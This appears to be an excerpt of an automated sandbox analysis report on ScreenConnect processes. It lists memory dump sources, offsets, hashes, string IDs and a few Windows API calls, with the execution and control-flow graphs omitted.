                                                                                    • Instruction ID: 7331965739f505b3ba157259e7fcf0f861f4e4c9bb7001c3a52fa1c0d8ff3824
                                                                                    • Opcode Fuzzy Hash: 93fc62d331249bd03888fc6c4eb325a31d1ba17d3dd12d68c4eb134f2a34ed59
                                                                                    • Instruction Fuzzy Hash: FA2100B6C002098FCB10CF9AC444AEEBBF4FB88324F14846ED969A7251C779A545CFA5
                                                                                    APIs
                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0584663E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessSession
                                                                                    • String ID:
                                                                                    • API String ID: 3779259828-0
                                                                                    • Opcode ID: bc1425594e8dfc04881e0500e2891cf0cb76480479107387552fc2bb0c9a44b7
                                                                                    • Instruction ID: 37e37d9e95a4a4971d7cf9f68d80bc98bcd5864402f7b067eac457a7975b83f3
                                                                                    • Opcode Fuzzy Hash: bc1425594e8dfc04881e0500e2891cf0cb76480479107387552fc2bb0c9a44b7
                                                                                    • Instruction Fuzzy Hash: E81112B1C002598FCB20CF9AC445BEEFBF4FB48324F10846AD959A7251D378A944CFA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2950477734.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_d5d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 11266e653d128f807777dc9bc88a62acb584ee522b662609aaf7b1bd9716faaa
                                                                                    • Instruction ID: 81248912449b5b32aac2035bca0bfab9cc6638f2279fee4c69b13c73509917c5
                                                                                    • Opcode Fuzzy Hash: 11266e653d128f807777dc9bc88a62acb584ee522b662609aaf7b1bd9716faaa
                                                                                    • Instruction Fuzzy Hash: EC210376504244DFCF25DF14D9C0B26BF66FB98311F248169EC0A4B25AC336D85ACAB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2950477734.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_d5d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                    • Instruction ID: 2f8bc46243661c78b53cdf9a5063020641498ead0d138c8439ab69aa1266acf3
                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                    • Instruction Fuzzy Hash: F711AF76504280CFCF16CF10D9C4B16BF62FB98324F28C6A9DC094B256C336D85ACBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2950477734.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_d5d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fcf5cff9c04ab11aeb726f3b06cd51da4a83fd0c7460d8da007e0b422025b1d9
                                                                                    • Instruction ID: a2570ec8abc40573ce0cf07869426d84720371de1be2f527f27169b7407075f1
                                                                                    • Opcode Fuzzy Hash: fcf5cff9c04ab11aeb726f3b06cd51da4a83fd0c7460d8da007e0b422025b1d9
                                                                                    • Instruction Fuzzy Hash: F901F7310083009AEB304A2DC984767BF99EF41325F1CC52AED484B2C6C279D849C6B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2950477734.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_d5d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 48cce2b33e67c740dfb9f225ce5c84836b220f997df7429dea68117621f9819b
                                                                                    • Instruction ID: ec75b2ce0c563326c8df3084a6d8a2cc1bdbde1b2d23e1451e7ea83a6e5f8b03
                                                                                    • Opcode Fuzzy Hash: 48cce2b33e67c740dfb9f225ce5c84836b220f997df7429dea68117621f9819b
                                                                                    • Instruction Fuzzy Hash: 77010C6140E3C09ED7128B258894B52BFB8EF53225F1DC5DBDD888F2E7C2699849C772
                                                                                    APIs
                                                                                    • RtlGetVersion.NTDLL(0000009C), ref: 01374DBE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2952340250.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_1370000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID: `Q^q
                                                                                    • API String ID: 1889659487-1948671464
                                                                                    • Opcode ID: 3020b2753ea4a28e75ead8e10598830d2df03738bd38711214487b91c07a7cdc
                                                                                    • Instruction ID: 667049b21329d56e175e16c59cca5a8779aced83918a0ec68605ff65d42b9879
                                                                                    • Opcode Fuzzy Hash: 3020b2753ea4a28e75ead8e10598830d2df03738bd38711214487b91c07a7cdc
                                                                                    • Instruction Fuzzy Hash: 67212571901228DFEB60CF59C804B99FBB9FB04314F1085D9D50CA7290C7756A88CF92

                                                                                    Execution Graph

                                                                                    Execution Coverage:10.2%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:5
                                                                                    Total number of Limit Nodes:1
                                                                                    [execution graph omitted: rendered graph data not recoverable as text; API node: SetProcessMitigationPolicy]
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: 4a033cc4a2e46df3aa146268f5fd6d45905a58f6467ef2981126ad1ce8a2d39c
                                                                                    • Instruction ID: 68f45276b452fe5adbd57f0796f7b666f9104d863064923eb457089be1114bee
                                                                                    • Opcode Fuzzy Hash: 4a033cc4a2e46df3aa146268f5fd6d45905a58f6467ef2981126ad1ce8a2d39c
                                                                                    • Instruction Fuzzy Hash: EA821631B0EB4E4BEB799BA884746B577D2EF94340F56027AD44DC72F6DE28B9068340

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    [control-flow graph omitted: rendered graph data not recoverable as text; no API nodes, internal calls only]
Strings
Memory Dump Source
• Source File: 00000008.00000002.2973911873.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: L\s
• API String ID: 0-3972157774
• Opcode ID: ab67455759a2cf5df2b90cc0a056831bf621f255417b223f321ff12b6fb09ac5
• Instruction ID: 4d732246cca836f246aed09b720d343cbf17de33c0fcdd72b407e718f594c912
• Opcode Fuzzy Hash: ab67455759a2cf5df2b90cc0a056831bf621f255417b223f321ff12b6fb09ac5
• Instruction Fuzzy Hash: 8F327B61F1EA4E0BF778AB6C84756B923D2EFA4318F11117AD05DC31E7DD28BD429241
Strings
Memory Dump Source
• Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: H
• API String ID: 0-2852464175
• Opcode ID: 736c320f5b070c5d9658d82354f6fefbafc1234df1e180d7f8580be5080b4759
• Instruction ID: ce87b0802e036b37c78196efc2e494f60f069dcb97f5f81025ce488b4b5e8bda
• Opcode Fuzzy Hash: 736c320f5b070c5d9658d82354f6fefbafc1234df1e180d7f8580be5080b4759
• Instruction Fuzzy Hash: D3F1FA31F0EB4F4AEB7997A844716B976D2EF94344F56027AD44DC72F6DE28FA018240
Strings
Memory Dump Source
• Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: H
• API String ID: 0-2852464175
• Opcode ID: 968aa5e0e262ca7cd40f82dbb5e5b44454af2759318c88c4fada7cb1e4b0c7df
• Instruction ID: 3ef09b40c8f5369190c798347d0e558bbac56a75cd33076d4e9148605b423955
• Opcode Fuzzy Hash: 968aa5e0e262ca7cd40f82dbb5e5b44454af2759318c88c4fada7cb1e4b0c7df
• Instruction Fuzzy Hash: EFE1D731F0EB4F4BEB7997A884706B936D2EF94344F55427AD04DC32F6DE28BA429240

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: H
• API String ID: 0-2852464175
• Opcode ID: 688ff2a22f7592579144fb92a01f15adbfb05a0ebe37bcb837e9646fc8d35e3c
• Instruction ID: 04f865f1e9234c4df46ca4cc89f0d77596b36374e83518bd650583fe13e8e1db
• Opcode Fuzzy Hash: 688ff2a22f7592579144fb92a01f15adbfb05a0ebe37bcb837e9646fc8d35e3c
• Instruction Fuzzy Hash: 72D1B631F1AB4F4AEB79A7A444706B976E1EF94344F16027AD04DC72F2DE28FA458340

Control-flow Graph

Memory Dump Source
• Source File: 00000008.00000002.2973911873.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ffd5f2a0828abfd8e47079571212386c384d9642791430f38e52619c91a92b96
• Instruction ID: a14b12dd37cdbe87275e19ebf57dc36598d8c48e85f1eb2b5c3221a8fa95ca64
• Opcode Fuzzy Hash: ffd5f2a0828abfd8e47079571212386c384d9642791430f38e52619c91a92b96
• Instruction Fuzzy Hash: D1428631B1DA4A4FE329EB6894615B1B7E1FF41318B1546BEC09FC71A7DE24B8528780

Control-flow Graph

Memory Dump Source
• Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8c8c8647c0165c3a24bb1ffb9f3490d55c483bab7ba6a75ff9fea761de82c803
• Instruction ID: 6bf141c366e47bf0ab2eb7354c771fd55cdd46e65c11eb489645444780e5f912
• Opcode Fuzzy Hash: 8c8c8647c0165c3a24bb1ffb9f3490d55c483bab7ba6a75ff9fea761de82c803
• Instruction Fuzzy Hash: F902B371B1DB4A4FEBA8EB288465A7573E1FFA8300F01457EE44EC32B6DE24E9418741

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000008.00000002.2973911873.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
Similarity
• API ID: MitigationPolicyProcess
• String ID:
• API String ID: 1088084561-0
• Opcode ID: a881bc39b8613701678b3faa1e0cc88647291f7001010518ee51a4391c12c3ad
• Instruction ID: 8814354eb268e044d2c4550dd507c647ccc7541b7a5639f78e8758f4612157e3
• Opcode Fuzzy Hash: a881bc39b8613701678b3faa1e0cc88647291f7001010518ee51a4391c12c3ad
• Instruction Fuzzy Hash: 66514B31D1DB4D4FDB289FA89C4A5E97BE0EF65310F04017FE489C3192DE68A846C792

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: _
• API String ID: 0-701932520
• Opcode ID: 311c2d83a328c07471707459830aaa28a6cd0047f4213bec8d254fb441215aa1
• Instruction ID: 839bdec48abb449c75a65351e2e0f0649ddc6005fc9c42c1b5eef07ceb359e0b
• Opcode Fuzzy Hash: 311c2d83a328c07471707459830aaa28a6cd0047f4213bec8d254fb441215aa1
• Instruction Fuzzy Hash: 6491C953A0F3D65FFB269A6C98B54E53F60EF52A2470A02B7C0D88B0B3DD14754A8771

Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: b1f633b279ced9c44329c6b2fc2a00ae2009f8ff0c16ee8472db23f2d40ec605
                                                                                    • Instruction ID: 3cc9e5885788c9af213a120b1c282768d5be2564c32606ab96d255951274625a
                                                                                    • Opcode Fuzzy Hash: b1f633b279ced9c44329c6b2fc2a00ae2009f8ff0c16ee8472db23f2d40ec605
                                                                                    • Instruction Fuzzy Hash: DB719C31F1AB1F4AEB79A7A484706BD72D2EF94344F52453AD40EC62F1DD38FA419640

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: _
                                                                                    • API String ID: 0-701932520
                                                                                    • Opcode ID: efaa26ca8613514d7e6b90fe901dbeb3f3aa9992af797fb24fd9ac5625efb45b
                                                                                    • Instruction ID: a75924ed0daa0f40951a6b762c09ee8ee1adb80774159f277a26ab0162481423
                                                                                    • Opcode Fuzzy Hash: efaa26ca8613514d7e6b90fe901dbeb3f3aa9992af797fb24fd9ac5625efb45b
                                                                                    • Instruction Fuzzy Hash: 8351B367A0F3D65FEB269A6C98B64D53F60EF52A2470A02F7C0C44B0B3DD14754A87A1

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: o
                                                                                    • API String ID: 0-252678980
                                                                                    • Opcode ID: 379dee664ebd8a11ed33baaa48ba33156798ca7bde3a92b848e34bca2951c879
                                                                                    • Instruction ID: 531c06546ae529dae48f2b291af0c4a0ec7237fc053e5148b0bf224e2ea68aba
                                                                                    • Opcode Fuzzy Hash: 379dee664ebd8a11ed33baaa48ba33156798ca7bde3a92b848e34bca2951c879
                                                                                    • Instruction Fuzzy Hash: B3115732E1AA8D1FEB55DB6884259BCBFA1EF81200F0542FAD048C70E6DD2866058340

                                                                                    Control-flow Graph

                                                                                    • Opcode Fuzzy Hash: 4842659c969da114b17146e25d6b5358edbbd695fa0e051e7bfacd4c3622cd9c
                                                                                    • Instruction Fuzzy Hash: AE41C263A0F3D65FFB229A6C98B64D53F60EF1262470A42F7C0C54B0B3D914754A83A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c4df3860cda40059e4d2ceba6a8291c7b8fdda648ed8eed0d0eaec05ac7b8310
                                                                                    • Instruction ID: 5d0569d60d29b0832c8978e8d5cab54a38c361909bcd51ca04a260d989247ff3
                                                                                    • Opcode Fuzzy Hash: c4df3860cda40059e4d2ceba6a8291c7b8fdda648ed8eed0d0eaec05ac7b8310
                                                                                    • Instruction Fuzzy Hash: F341C122A0F7D65FFB12AB7C98B64D43F60AF1262470A43F7C0C98B0B3DA15755A8761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 50b92ccb54ae010501187b27a70efc919e17c97fff5bfa3207b0828fcd3c6ea4
                                                                                    • Instruction ID: 733efc3253349444e4d063626812412ed2b295a4c7cc2669dbe169c4ccbf68f0
                                                                                    • Opcode Fuzzy Hash: 50b92ccb54ae010501187b27a70efc919e17c97fff5bfa3207b0828fcd3c6ea4
                                                                                    • Instruction Fuzzy Hash: 1B21A222A0F7CE1FE7BA86685C695703BA0EF5725070E42F7D488CB0B3D9186D46C361
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1e06d75c989359865cf57c48348c3bd2aa6bd41119b8f46d8e5c10e9add40eb9
                                                                                    • Instruction ID: f935b1cb47d37219155faac6e8cb81dbdfd4410bb6a8ca5183b722c528c91739
                                                                                    • Opcode Fuzzy Hash: 1e06d75c989359865cf57c48348c3bd2aa6bd41119b8f46d8e5c10e9add40eb9
                                                                                    • Instruction Fuzzy Hash: 0531F762B0EA8D0FE7E4DA6D689D1707BD1EFA925170941FBE48DC7272E9119C41C341
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb84b28c4a887570343b21016245a0c71f500c3efe39e14bd9ce5944c7d6294d
                                                                                    • Instruction ID: f20d840b8ff2e2b087a46c1ad9e71af4697d9a4bb08b67b89671c4403b97fa4a
                                                                                    • Opcode Fuzzy Hash: bb84b28c4a887570343b21016245a0c71f500c3efe39e14bd9ce5944c7d6294d
                                                                                    • Instruction Fuzzy Hash: 4B41B163A0F7D65FFB229B6C98B64E43FA0EF1262470A42F7C0C94B0B3D91475568761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fec299ae9caa9936c7a9610da0619a296d6fd89db4fea66d4707bd164878bee1
                                                                                    • Instruction ID: ec7532e3278a61422175cb065b4611b4bea4480f469aefe1545dca996e8c1bd7
                                                                                    • Opcode Fuzzy Hash: fec299ae9caa9936c7a9610da0619a296d6fd89db4fea66d4707bd164878bee1
                                                                                    • Instruction Fuzzy Hash: 6B31D422D0F35A6FD711BBB8D4A18E47B60FF02B1871902B2D0D88B0B3DE1575968791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ff21d963aa35620bcd4d5bb9dcfe4f6ce591d551a78ce405dfea952c7606529
                                                                                    • Instruction ID: e3b2d92081282c94253d3c2e71c5a4c77c838c88472cbc92dba8ac931f954322
                                                                                    • Opcode Fuzzy Hash: 6ff21d963aa35620bcd4d5bb9dcfe4f6ce591d551a78ce405dfea952c7606529
                                                                                    • Instruction Fuzzy Hash: D921F523F1FE9A0BF7B6966C146417066C2DB9575070E03BEDE8CC72FAEC05A9065240
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3bc4f73e363dda8a869de1777813648aca7ba5249bdf0553a7da1c2c90fa3cf9
                                                                                    • Instruction ID: 88285f5420296b1f02902c25ed4d0746e49427ec37e3b5238e71fc4bd7ffdbcb
                                                                                    • Opcode Fuzzy Hash: 3bc4f73e363dda8a869de1777813648aca7ba5249bdf0553a7da1c2c90fa3cf9
                                                                                    • Instruction Fuzzy Hash: 0931913154E3C95FD317AB68D8659D57FB0EF4722470A02E7E089CB0B3CA1D594AC7A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f31a15e20db7f1c2421637bd0a01634e23f9fa8ddf791ffe9182cade8dc5501b
                                                                                    • Instruction ID: 58ef870bead2e941e645882ac51c8438639de1221aba227166845c80bb245c81
                                                                                    • Opcode Fuzzy Hash: f31a15e20db7f1c2421637bd0a01634e23f9fa8ddf791ffe9182cade8dc5501b
                                                                                    • Instruction Fuzzy Hash: A211A737F2EE4D4AEBA8D6A96C302FD36D1EF44354F0501BAE45DD32B2DE1699108245
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23cf13ae9a1ba760afcace8b7d2ea8ba5327acb557326f42c3d8bc8588eb8ca5
                                                                                    • Instruction ID: 050a51ebab0c600e90842a64abbc59806806e15b28bf83b624d18bd1e6f300e2
                                                                                    • Opcode Fuzzy Hash: 23cf13ae9a1ba760afcace8b7d2ea8ba5327acb557326f42c3d8bc8588eb8ca5
                                                                                    • Instruction Fuzzy Hash: 3211A2B6E0EB8C4BDFA5DBA44C751A83FE1FF55300F0601AAE058D31B2DA25A504C701
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4b917b739486f79e3d15c5509f4a8fefb4fbf5435a144a70e9885efea718d786
                                                                                    • Instruction ID: 13c07e064a8c93ca9388f7e559b9126144d6677c29d0619b91e9701d55d47342
                                                                                    • Opcode Fuzzy Hash: 4b917b739486f79e3d15c5509f4a8fefb4fbf5435a144a70e9885efea718d786
                                                                                    • Instruction Fuzzy Hash: 26118171B09A494FEB98EF688060B6577A1FF68300B1541E8D48DDB2A7DE25F945C780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5f10b4dfe80a6e34cf240387a81f199bc5a628f6d3ae72ee9bb5b1ae9c8625da
                                                                                    • Instruction ID: c8bb78141609451ab834093f65f0e66861ae9bae5473b2dfd1e3642fb1260512
                                                                                    • Opcode Fuzzy Hash: 5f10b4dfe80a6e34cf240387a81f199bc5a628f6d3ae72ee9bb5b1ae9c8625da
                                                                                    • Instruction Fuzzy Hash: BA118E71B09A494FEB98EF688060B6177A1FF68300B1541E8D48DDB2A7DA25E945C780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b191588b8b2457a2a056b6455f475ddd1a11998340211cca6b67a4f4d961160d
                                                                                    • Instruction ID: 47801e03b9d919c023ce3cd2fb37ec7e85092483ca88fc60a3ccdce425ff6176
                                                                                    • Opcode Fuzzy Hash: b191588b8b2457a2a056b6455f475ddd1a11998340211cca6b67a4f4d961160d
                                                                                    • Instruction Fuzzy Hash: CE11C115F0E74B0BEB799268447437536E1DF55300F0A41BFC05AC62FADC6C9D818301
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 142409c9abb348fc173db579eb1a2df5da93dee2847c759b83b9f6fc83aa9713
                                                                                    • Instruction ID: 44b861c8cddc699b693021417a365bf9e175196db0030126ccab048b85f1fc67
                                                                                    • Opcode Fuzzy Hash: 142409c9abb348fc173db579eb1a2df5da93dee2847c759b83b9f6fc83aa9713
                                                                                    • Instruction Fuzzy Hash: 0B012432F0FB4D4AEF69DA98A8710EC7751EFA1340F061276E04C821B3DE162A068290
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5d3bf7b4adf91a164a1b6c115e79ec3f548c40c88eec7ce8e7c73f2f963accf1
                                                                                    • Instruction ID: b4f79c2dcf27b0ddb67c95c3e053c4a8367ae4b2f6a629ba58c83aac1e03e62e
                                                                                    • Opcode Fuzzy Hash: 5d3bf7b4adf91a164a1b6c115e79ec3f548c40c88eec7ce8e7c73f2f963accf1
                                                                                    • Instruction Fuzzy Hash: 4501FF2160EBCD0FD39ACA6CACA80613FE0EB5B22130901EBE488CB273E8018C41C351
